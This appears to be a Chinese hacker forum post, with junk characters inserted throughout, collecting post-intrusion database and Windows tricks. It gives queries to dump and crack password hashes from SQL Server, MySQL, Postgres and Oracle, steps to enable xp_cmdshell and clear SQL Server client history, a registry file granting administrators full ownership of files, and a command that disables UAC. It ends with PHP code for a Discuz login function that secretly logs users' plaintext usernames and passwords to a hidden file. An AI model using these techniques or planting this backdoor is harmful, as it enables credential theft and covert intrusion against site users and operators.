. ~5 l1 R k8 ]4 \! E2 _8 N
各种类型数据库抓HASH破解最高权限密码! `( y1 d( P+ c- a+ `/ Z
1.sql server2000
4 L& _* E! f3 u. Z+ TSELECT password from master.dbo.sysxlogins where name='sa'+ S8 ^- Y# M t9 c0 a$ L0 u* m% \
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341- V- t' i& c9 t) s# U9 }( {
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A! U. ~% k( ]+ p/ O: j5 M- u# Z1 ] B
$ B3 o- n& d) t5 r0×0100- constant header
`$ O& w0 Z' v9 r34767D5C- salt1 W/ w" ~+ P* K6 C. x% O. J2 _4 t4 S
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
# _* ^) v# Q6 n' J1 K2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
6 F3 Z0 c6 U0 jcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
3 L. D# p {2 \' i1 nSQL server 2005:-4 q7 L! S/ \/ C- s; h& ?
SELECT password_hash FROM sys.sql_logins where name='sa'; f6 f4 Y% @6 ~& U5 f+ _
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F$ E }* _+ S$ \7 U y `5 z0 m X
0×0100- constant header
% W+ c G% U( Q+ Y8 N# l993BF231-salt
0 |6 e5 S5 Y8 s! f$ P5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash" E( a8 R* b5 M1 H$ X
crack case sensitive hash in cain, try brute force and dictionary based attacks.' e5 |+ z8 k+ U5 m3 n1 y8 H
5 \- k9 `/ t; u4 U- N' d9 V
update:- following bernardo’s comments:-( }- B/ a+ Q3 o" W, n/ S$ i
use function fn_varbintohexstr() to cast password in a hex string.
" k4 U/ T: M% ^4 Ze.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins1 m7 z$ D$ q, g
! p: G5 L5 n: o C" j- J) y+ i
MYSQL:-
8 \& Y$ l) }3 i* D. X. r- I+ u! N S+ E% N
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
% l# q& A d/ O- z8 y+ k2 T$ s- b7 K3 B0 q
*mysql < 4.1
5 m1 ?& H* S9 _% T) t1 N3 F* C. k$ e) }7 \9 _" N
mysql> SELECT PASSWORD(‘mypass’);3 `$ ?2 c& M) N6 c- `
+——————–+# B& B; I! q+ Z4 o% _3 w( |
| PASSWORD(‘mypass’) |
2 A9 A9 R# I: R8 N1 W4 ]+——————–+5 g |3 }) X' ]% `
| 6f8c114b58f2ce9e |
$ j+ q% c/ p3 [' K: a/ w+——————–+
+ r" n' `$ M; Q$ d4 P
( \5 S4 F6 o/ i2 a2 Y1 ^ a& C/ q$ o*mysql >=4.1
& q; h# D9 O5 E" G0 b& O7 L j8 j9 p6 C: d
mysql> SELECT PASSWORD(‘mypass’);
% f. o" y9 J% e+——————————————-+# Z: X. X, K) d' \
| PASSWORD(‘mypass’) |
P9 C6 Z2 l( `+——————————————-+
- v3 _$ i6 H& d| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |8 ]* A7 i/ d6 L6 x/ k ?, U
+——————————————-+: @/ u5 R. m4 L8 `0 k
t+ z6 z/ c0 r& s( y8 E% cSelect user, password from mysql.user* g8 Z$ X. M- Q- \ P% F
The hashes can be cracked in ‘cain and abel’
. Q( x! w; F& H+ y" w" P& q* ^5 Y' C/ L6 s
Postgres:-" t6 U1 n6 B: b2 b5 I4 c0 ~8 B( T
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)8 r& ?3 R# E# R, Y- N5 B$ f
select usename, passwd from pg_shadow;
$ z7 w# G- S# T2 f1 K& xusename | passwd
+ ~; R6 V8 M7 x1 _3 P% q——————+————————————-4 G1 ~* `/ f( I1 ^, G
testuser | md5fabb6d7172aadfda4753bf0507ed4396# R3 T0 S6 B% ?) v! S5 }
use mdcrack to crack these hashes:-5 {) T3 Q _; r, ?, ]& b: F
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
) V% C$ b- z0 e$ n0 G
# `' x; Y: y6 H$ r$ o& VOracle:-2 N/ ~" u* Q( Z. u! [4 A( J
select name, password, spare4 from sys.user$
% F- Q, D5 } X( x7 Xhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
" p- U1 v5 ], rMore on Oracle later, i am a bit bored….
4 N% d$ G0 y6 h8 b. ^: N6 @* f
4 T! W6 G$ X( \& d
! _9 F8 y Y0 t在sql server2005/2008中开启xp_cmdshell
" |& f9 s3 ^1 T7 c0 |# x-- To allow advanced options to be changed.
1 P8 s9 g$ u( v) pEXEC sp_configure 'show advanced options', 1
, T. n$ ?5 Y9 R. AGO/ H. @- ~/ |! y5 e: Q9 U
-- To update the currently configured value for advanced options.7 S% j3 H; g5 d
RECONFIGURE
) X: f9 ^/ H u0 c: U5 [9 nGO) Z4 I5 k: [) I) ?' ^
-- To enable the feature. i! A, h! h3 K2 w8 C% Z U/ D6 E( y
EXEC sp_configure 'xp_cmdshell', 1. {4 V w5 {* D& J
GO8 M' J4 ~, _" i! Q
-- To update the currently configured value for this feature.
1 U4 g. X4 X) Q2 NRECONFIGURE
* t0 h( j! n D' h2 c. n! aGO
" n% e( i; U" L GSQL 2008 server日志清除,在清楚前一定要备份。
& H! z7 p( K$ ^6 `6 [0 N& x如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
6 R S2 j* S$ K( E2 dX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin; ^3 B' Q+ Y- ?# d$ ~' T
* @* H( K& I+ ]' R3 B: o, N对于SQL Server 2008以前的版本:
( l& C2 |# A1 kSQL Server 2005:6 s9 L; l U0 u5 P5 E2 l
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat! e9 `0 ]1 k* O% m
SQL Server 2000:; l p* w5 z8 p7 L0 V
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。) n& D$ S! O- c5 x. D, Y' \+ I
6 E' [: u% Z# X9 A+ p: Y& H% e
本帖最后由 simeon 于 2013-1-3 09:51 编辑- a ^- \ p+ g4 \- u
& h4 l5 K- N; [% o' O' Q
$ V% \. ^2 z/ G, ~* \; s6 iwindows 2008 文件权限修改- h! g+ k* V/ z ^
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx3 r! H g% C, i, j. O$ E+ B; K
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad981 r/ c" A) V6 a0 _. v5 F4 y
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
9 ~, s7 F1 ^9 ^) w& k( e$ e O \& U) s/ x$ n' G
Windows Registry Editor Version 5.00
+ `! m3 D1 \7 k[HKEY_CLASSES_ROOT\*\shell\runas]# N$ \+ ~6 [ q5 U
@="管理员取得所有权"4 X/ j- x1 D6 `: U8 A2 m
"NoWorkingDirectory"=""
/ P! V) C4 g4 ~) F1 P. M$ O, E[HKEY_CLASSES_ROOT\*\shell\runas\command]
8 Y: A" w! O0 A@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* B* ~( b" \% |6 M
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"9 G6 j5 V. |& `# i& ?
[HKEY_CLASSES_ROOT\exefile\shell\runas2]4 l0 P) F- k$ o, j: U3 O0 ~* f
@="管理员取得所有权"
$ V7 h2 T3 V6 g, [; x( g"NoWorkingDirectory"=""' i3 y# Y J$ w C
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]+ s: X! ?! q' C, q) H
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
- h0 m# N2 r- E5 V( U! D2 d- W/ Q"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, c/ s. m$ N9 H8 g6 z- g: G+ y
1 D, K) t5 P8 V# f5 v[HKEY_CLASSES_ROOT\Directory\shell\runas]
, ~7 ]" A# z' e) @+ |0 N@="管理员取得所有权"( a4 A$ \9 W/ A9 |" H; C
"NoWorkingDirectory"=""
3 g6 ?$ p4 j7 z: a[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
: P7 G0 J3 \/ s) L3 ?@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
1 h! p- r+ m" y; a"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
( B) D7 |1 e3 y; D+ C X! P5 G# b% b
3 w7 p# i3 x+ ?" Y% J; z! Dwin7右键“管理员取得所有权”.reg导入1 n6 v2 p$ c2 w0 [; V
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,, S& S+ k: x- w D- I
1、C:\Windows这个路径的“notepad.exe”不需要替换
- A9 T6 u. E' G. i( j; y2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
" b. G' u1 r, ~; c7 H1 N) E3、四个“notepad.exe.mui”不要管
1 X! P3 v3 f7 I; k/ y4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
5 a. h) O; V) bC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
) I I$ u `7 }替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
- e+ q! {1 v+ J: R7 f( |替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
1 I2 X1 n) t; @0 qwindows 2008中关闭安全策略:
5 U& [( u; l# f5 \0 ^reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f0 d6 o! m( j$ T1 |, U9 m0 d: B
修改uc_client目录下的client.php 在( }% `, ], \) [, i3 y
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
: }" D# m7 ]' Q. a9 M/ |( f& }1 o下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
/ R% x! R* z0 O- |1 v: H% ]你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
0 Z% P" f9 C. t, Qif(getenv('HTTP_CLIENT_IP')) {
/ k h! _2 x! Q$onlineip = getenv('HTTP_CLIENT_IP');" ], s7 h* `% X! J
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
1 }5 G! V1 N1 a& W% e, `+ K' n$onlineip = getenv('HTTP_X_FORWARDED_FOR');
- \0 y! {9 N4 s* O& a} elseif(getenv('REMOTE_ADDR')) {/ [9 ?1 @/ x) D
$onlineip = getenv('REMOTE_ADDR');
; ^, n' d) y+ R* W# o9 r5 {$ M} else {
3 B$ b1 O; f6 P( M/ t# g( ^$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
2 d- ]) i9 B, \6 s( h: g G& J/ h- D}
2 H& H* q a, P2 a0 C $showtime=date("Y-m-d H:i:s");
) G% h- w8 K" }1 D, |: @ $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";3 c. A% Q( A& k9 {
$handle=fopen('./data/cache/csslog.php','a+');
) q6 s" ~- D' k1 b w5 |/ ? $write=fwrite($handle,$record); |